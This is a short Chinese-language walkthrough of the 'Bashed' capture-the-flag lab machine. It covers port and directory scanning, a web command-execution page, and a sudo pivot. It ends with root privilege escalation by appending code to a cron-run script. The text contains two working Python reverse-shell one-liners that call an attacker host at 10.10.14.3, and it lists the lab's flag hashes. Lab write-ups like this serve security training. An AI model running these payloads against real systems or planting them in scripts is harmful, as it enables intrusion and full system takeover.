OSCP-Bashed靶场
2022-12-8 19:59:12 Author: 轩公子谈技术(查看原文) 阅读量:9 收藏

网络畅通

端口扫描

nmap 10.10.10.68

只有一个80

给了一个github地址,还有一个链接,类似php大马,直接访问404

目录扫描

feroxbuster -u http://10.10.10.68/ -x sh,cgi,pl,html,java,php

在dev目录发现了命令执行

6cdbacaaa253542f2aad211ad011aea4

反弹shell

发现python可以成功

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

查看权限分配

sudo -l

显示有一个用户,没密码

sudo -u scriptmanager /bin/bash

但也没权限查看root目录

发现了脚本目录,里面有个脚本

脚本文件是普通用户,生成的txt确是root

查看定时任务

三个地方没看到,此时刷新ls,发现txt有多了

猜测可能存在定时任务,只是权限不够,看不了

获取flag

还是用py的反弹shell

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.3\",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" >> test.py

c54332d45d7adadc2a67ad68998fc9bb

查看定时任务,进入到脚本目录下,然后遍历以py结尾的文件,然后执行。


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MDg2NDI4OA==&mid=2247487388&idx=1&sn=76a43b9c81e366a043cf97cb35b7b26d&chksm=fce9a853cb9e2145883541f56c0e889cdc5b3c7ae1146498af4684c050454d85a5d4d47cb77a#rd
如有侵权请联系:admin#unsafe.sh